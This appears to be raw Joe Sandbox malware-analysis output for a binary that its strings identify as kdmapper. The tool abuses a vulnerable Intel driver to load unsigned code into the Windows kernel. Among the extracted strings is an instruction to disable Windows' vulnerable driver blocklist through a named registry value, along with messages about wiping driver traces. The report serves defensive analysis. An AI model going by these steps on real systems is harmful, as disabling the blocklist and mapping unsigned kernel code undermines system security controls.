                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                    • String ID:
                                                    • API String ID: 4293554670-0
                                                    • Opcode ID: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                    • Instruction ID: 27900bea93ff24d10b12069eee396df90a91dd3be231a86b762a1e70fe69507b
                                                    • Opcode Fuzzy Hash: 0658ebe21b7779fd09a5f58bc469b15e87cc917d8bac635e3e8b3ddf396c297c
                                                    • Instruction Fuzzy Hash: 07917233B38A4342EAA4AB15E404675E390AFA47B4F940334D97D62BD4DF7FE4658630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Free$ControlDevice$Alloc_invalid_parameter_noinfo_noreturn_stricmpmemset
                                                    • String ID: 0$@
                                                    • API String ID: 2904545761-1545510068
                                                    • Opcode ID: e415704aab537d9934ef91362266595f5def0288391fa7a6341463efddda99e5
                                                    • Instruction ID: 1026b9a22080c576891a4b5fee547ab740149f4ae8479badaafc4d2286f3d6ac
                                                    • Opcode Fuzzy Hash: e415704aab537d9934ef91362266595f5def0288391fa7a6341463efddda99e5
                                                    • Instruction Fuzzy Hash: C7A1B233B68B4186EB509B21E88036DE7A1FB88784F904335DA5D67B98DF3DE491C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Free$InformationQuerySystem$Alloc_invalid_parameter_noinfo_noreturn_stricmp
                                                    • String ID:
                                                    • API String ID: 562193759-0
                                                    • Opcode ID: ba5146eabd586182c5c624808a67abf76309a0430c83361b4ecf8e90a1d2cc8f
                                                    • Instruction ID: b53cd4c8fe86a1e84006da3a5cdb21236482eb06e16de758c700afa959b78ef5
                                                    • Opcode Fuzzy Hash: ba5146eabd586182c5c624808a67abf76309a0430c83361b4ecf8e90a1d2cc8f
                                                    • Instruction Fuzzy Hash: 8551D763B3894342EAA0EB15E800339E261FFA5BE4F944330DA5D666D4DE3FD5918730
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 313767242-0
                                                    • Opcode ID: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                    • Instruction ID: 8334bd910c9e8225a4fa4e86557c84149a83352806d7ac7fe8b7516f5add3a33
                                                    • Opcode Fuzzy Hash: 0a08945691a620697485375cb202d0f93b674166cfe272dc12a460a651dbbd82
                                                    • Instruction Fuzzy Hash: E0312173624B8286EBA0AF60E8407E9F364F794744F84403ADA4D57B95EF3DD558C720
                                                    APIs
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EFF93
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EFF8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                    • String ID: gfffffff$gfffffff
                                                    • API String ID: 1934640635-161084747
                                                    • Opcode ID: 5313d45d66579e6ecaa239320235c4f9602ceac26ef8ae8d27debff3e56f2ea8
                                                    • Instruction ID: 96237cb92c3c99433532880b39ccb325c0a76013e54546a4ca823dc423b6877f
                                                    • Opcode Fuzzy Hash: 5313d45d66579e6ecaa239320235c4f9602ceac26ef8ae8d27debff3e56f2ea8
                                                    • Instruction Fuzzy Hash: 30A1EEA3B25B8982DA40DF16E44426DB3A0F798B84F919232DB8C57745DF3DE5E0C310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                    • Instruction ID: f8b1b43dfc7ac2816f49fd7d6dbc42347204f89e00a9ef09828657414f2560ba
                                                    • Opcode Fuzzy Hash: 58ad573f1b6cc880fa708dd3b815a5a05b201a521b9c08ca75221f68de6631f4
                                                    • Instruction Fuzzy Hash: 49115122B25F028AEB40DF60E8442B8B3B4FB59758F440E35DA6D56754DF3CD1648350
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleMessage
                                                    • String ID: !x-sys-default-locale
                                                    • API String ID: 4235545615-2729719199
                                                    • Opcode ID: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                    • Instruction ID: 6fb38f357999a434ca8ec1cbbdaa67eda00f0f489c2b00e50cb0bfd8bd9afb98
                                                    • Opcode Fuzzy Hash: ce0abaa9da4b8b40a8a02033c447ee2787cd80be453fa13a0568637d961edfc7
                                                    • Instruction Fuzzy Hash: 0301C473B3878382E7919B11F40076AE7A1FBA4784F948135DA8967B94CF7ED514C720
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                    • Instruction ID: 0f2c94b6ef60238e55395b6d38918c32d45d9ce143d173e0e0de62d2f6541ef7
                                                    • Opcode Fuzzy Hash: 7968070e1f2d13b7acf864d44870ea5513e90aff6d164408a12cac6280b5e324
                                                    • Instruction Fuzzy Hash: 56A00122A38813E5EA85BB00E850820E220ABA0340FA50572D41E624A09F3EA4648230
                                                    APIs
                                                    • VirtualAlloc.KERNEL32 ref: 00007FF7738EE0B0
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738EE283
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE293
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738EE2A3
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738EE2D8
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738EE31A
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7738EE326
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE345
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE60D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@??6?$basic_ostream@_D@std@@@std@@U?$char_traits@U?$char_traits@_V01@@W@std@@@std@@$memmove$AllocV21@@Vios_base@1@Virtual
                                                    • String ID: bytes of PE Header$ExAllocatePoolWithTag$[!] Failed to find ExAllocatePool$[+] DriverEntry returned 0x$[+] Freeing memory$[+] Image base has been allocated at 0x$[+] Memory has been released$[+] Skipped 0x$[-] Callback returns false, failed!$[-] Failed to allocate remote image in kernel$[-] Failed to call driver entry$[-] Failed to fix cookie$[-] Failed to resolve imports$[-] Failed to write local image to remote image$[-] Image is not 64 bit$[-] Invalid format of PE image$[-] WARNING: Failed to free memory!$[<] Calling DriverEntry 0x
                                                    • API String ID: 3661745735-2368498643
                                                    • Opcode ID: 149e5b350b02ac96e6b7ac2af94cf2f7a579598cd706d5a0c900d21a85f83d6a
                                                    • Instruction ID: ab6f368a0fac17d32f80dcdfce46b5e45e46fde9de740bedd88f20e367dc52fb
                                                    • Opcode Fuzzy Hash: 149e5b350b02ac96e6b7ac2af94cf2f7a579598cd706d5a0c900d21a85f83d6a
                                                    • Instruction Fuzzy Hash: DC025862F78A0385EA90EB65E8401B9E361AF55B84FC04636DD0D6B695EF3EE524C330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@_invalid_parameter_noinfo_noreturn$Close$??6?$basic_ostream@_AddressProcU?$char_traits@_ValueW@std@@@std@@memmove$CreateHandleInitModuleStringUnicodeV21@@Vios_base@1@
                                                    • String ID: 4$Fatal error: failed to acquire SE_LOAD_DRIVER_PRIVILEGE. Make sure you are running as administrator.$ImagePath$NtLoadDriver$RtlAdjustPrivilege$SYSTEM\CurrentControlSet\Services\$Type$[+] NtLoadDriver Status 0x$[-] Can't create 'ImagePath' registry value$[-] Can't create 'Type' registry value$[-] Can't create service key$[-] Registry path to disable vulnerable driver list: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CI\Config$[-] Set 'VulnerableDriverBlocklistEnable' as dword to 0$[-] Your vulnerable driver list is enabled and have blocked the driver loading, you must disable vulnerable driver list to use kdmapper with intel driver$\??\$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                    • API String ID: 2246562810-3754729842
                                                    • Opcode ID: bad4f9c7ded0c0f6d20b53bc3d8834b7fe06785ed49c321b1fa59c292b833d7c
                                                    • Instruction ID: 13068454ab7ce7cb183342424eeaad69fd0ebd9f3b53f1fd0b7b6dd4ade9761d
                                                    • Opcode Fuzzy Hash: bad4f9c7ded0c0f6d20b53bc3d8834b7fe06785ed49c321b1fa59c292b833d7c
                                                    • Instruction Fuzzy Hash: 6DD17163F38A0795EB90EB64E4442BCE361AB94794F800231DA5D67698DF3EE169C370
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738ED9D3
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDA13
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738EDB2A
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDB6D
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDC60
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EDC20
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDA36
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738EDD27
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDD67
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDD8A
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EDDD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevice_invalid_parameter_noinfo_noreturn$AcquireExclusiveLockmemmovememset
                                                    • String ID: 0$MmAllocatePagesForMdl$MmMapLockedPagesSpecifyCache$MmProtectMdlSystemAddress$[!] Failed to find MmAlocatePagesForMdl$[!] Failed to find MmMapLockedPagesSpecifyCache$[!] Failed to find MmProtectMdlSystemAddress$[+] Allocated pages for mdl$[-] Can't allocate pages for mdl$[-] Can't change protection for mdl pages, cleaning up$[-] Can't read the _MDL : byteCount$[-] Can't set mdl pages cache, cleaning up.$[-] Couldn't allocate enough memory, cleaning up
                                                    • API String ID: 2001844386-3948469999
                                                    • Opcode ID: f276b7c405476224f99460dd4f2724caf038036cd5c9b10b06ba8ab5ae69e923
                                                    • Instruction ID: 56dd7638a5bc923e62dec198f1b59a0635a8e37bbe5e52160615d5e7a9bda2ce
                                                    • Opcode Fuzzy Hash: f276b7c405476224f99460dd4f2724caf038036cd5c9b10b06ba8ab5ae69e923
                                                    • Instruction Fuzzy Hash: BBE16023F78B4395EA80FB64D8802B8E361AB54798FC45332D95C66695DF3EE568C330
                                                    APIs
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5AD0
                                                    • CloseHandle.KERNEL32 ref: 00007FF7738E5AE3
                                                      • Part of subcall function 00007FF7738E45E0: memset.VCRUNTIME140 ref: 00007FF7738E4325
                                                      • Part of subcall function 00007FF7738E45E0: GetTempPathW.KERNEL32 ref: 00007FF7738E4333
                                                      • Part of subcall function 00007FF7738E45E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4453
                                                    • CloseHandle.KERNEL32 ref: 00007FF7738E5AF6
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E5B56
                                                    • memset.VCRUNTIME140 ref: 00007FF7738E5B85
                                                      • Part of subcall function 00007FF7738E89C0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E89F3
                                                      • Part of subcall function 00007FF7738E89C0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E8A12
                                                      • Part of subcall function 00007FF7738E89C0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E8A44
                                                      • Part of subcall function 00007FF7738E89C0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E8A5F
                                                      • Part of subcall function 00007FF7738E89C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E8AA9
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5BCA
                                                      • Part of subcall function 00007FF7738E9EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F50
                                                      • Part of subcall function 00007FF7738E9EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F72
                                                    • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5BD0
                                                    • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5BD9
                                                    • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E5C26
                                                    • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF7738E5C64
                                                    • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738E5C74
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E5CA2
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E5CCF
                                                    • _wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7738E5CEE
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D71
                                                    • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D7C
                                                    • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7738E5D86
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E5DC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@?setstate@?$basic_ios@U?$char_traits@_V01@@W@std@@@std@@_invalid_parameter_noinfo_noreturnrand$?good@ios_base@std@@CloseHandleInit@?$basic_streambuf@V12@memset$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_Osfx@?$basic_ostream@_PathTempV?$basic_streambuf@_wremovefclose
                                                    • String ID: [!] Error dumping shit inside the disk$[!] Failed to open file for writing$[+] Vul driver data destroyed before unlink$[<] Unloading vulnerable driver
                                                    • API String ID: 853663293-655004714
                                                    • Opcode ID: 96eae8768ba8d36aecfb9f1dfd7fd46c807c9eb899f352e668a9978eb4071c0a
                                                    • Instruction ID: 2c583873e766ff4de925c906018113f5eeb378d019804286431883fafc2eb359
                                                    • Opcode Fuzzy Hash: 96eae8768ba8d36aecfb9f1dfd7fd46c807c9eb899f352e668a9978eb4071c0a
                                                    • Instruction Fuzzy Hash: 2EA19063B38A4381EB80EB64E454278E361EB94BA4F804332DA5D676A8DF3ED555C730
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32 ref: 00007FF7738F2DF5
                                                    • RtlInitUnicodeString.NTDLL ref: 00007FF7738F2E68
                                                    • RegOpenKeyW.ADVAPI32 ref: 00007FF7738F2EC6
                                                    • RegCloseKey.ADVAPI32 ref: 00007FF7738F2EDF
                                                    • GetProcAddress.KERNEL32 ref: 00007FF7738F2EEF
                                                      • Part of subcall function 00007FF7738EA7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA839
                                                      • Part of subcall function 00007FF7738EA7C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA859
                                                      • Part of subcall function 00007FF7738EA7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA869
                                                      • Part of subcall function 00007FF7738EA7C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA9E6
                                                      • Part of subcall function 00007FF7738EA7C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA9ED
                                                      • Part of subcall function 00007FF7738EA7C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA9FA
